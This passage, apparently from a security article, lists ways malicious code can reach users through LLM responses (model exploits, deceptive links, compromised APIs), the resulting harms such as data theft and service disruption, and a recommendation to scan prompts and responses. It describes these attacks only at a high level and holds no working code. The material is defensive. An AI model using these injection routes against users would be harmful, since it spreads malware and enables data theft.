- Exploiting vulnerabilities in the model to inject malicious code into responses.
- Deploying social engineering attacks that send users carefully crafted responses that appear to be legitimate, but that contain links to websites or files that spread malicious code.
- Using compromised APIs or third-party services that inject malicious code into responses.
- Data theft or manipulation: Code can be designed to steal or manipulate sensitive data, such as personal financial or customer information or intellectual property (IP). Once the data has been exfiltrated, the attacker can:
- Use the stolen data to commit identity theft or financial fraud, or disrupt markets.
- Sell the data or IP on the dark web.
- Publish it on the Internet for the world to see.
- All of the above.
- Service disruption: Malicious code can trigger malfunctions within corporate systems, resulting in service disruptions that can cause delays in processing customer or vendor interactions, slow decision-making, reduce efficiency, and damage business opportunities, all of which could lead to significant financial losses for the organization.
- Reputational damage: A successful malicious code attack via an LLM could harm the company's reputation, resulting in loss of trust from customers, stockholders, regulators, partners, and other stakeholders and leading to long-term financial impacts.
- Every LLM prompt for private, confidential, or otherwise exploitable content and prevent it from leaving the system.
- Every response for malicious code and other suspicious content and prevent it from entering the system.